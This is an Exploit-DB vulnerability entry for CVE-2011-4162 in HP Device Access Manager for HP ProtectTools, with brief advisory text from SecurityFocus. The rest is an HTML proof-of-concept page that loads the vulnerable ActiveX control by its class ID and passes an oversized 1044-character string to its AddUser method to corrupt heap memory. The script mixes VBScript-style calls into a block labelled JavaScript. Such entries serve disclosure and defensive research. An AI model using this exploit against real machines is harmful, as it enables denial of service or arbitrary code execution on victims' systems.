HP Device Access Manager for HP ProtectTools 5.0/6.0 Heap Memory Corruption Vulnerability

2011-12-02T00:00:00
ID EDB-ID:36403
Type exploitdb
Reporter High-Tech Bridge SA
Modified 2011-12-02T00:00:00

Description

HP Device Access Manager for HP ProtectTools 5.0/6.0 Heap Memory Corruption Vulnerability. CVE-2011-4162. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/50895/info

HP Device Access Manager for HP ProtectTools is prone to a remote heap-memory-corruption vulnerability.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

HP Device Access Manager for HP ProtectTools versions prior to 6.1.0.1 are vulnerable.

<HTML>
<BODY>
<object id="target"
classid="clsid:{1A6F1F9C-7986-4CAB-BD5E-0E0BC09DEE8B}"></object>
<SCRIPT language="JavaScript">
function Do_It()
{
arg1=String(1044, "X")
target.AddUser arg1
}
</SCRIPT>
<input onclick="Do_It()" type="button" value="P0c">
</BODY>
</HTML>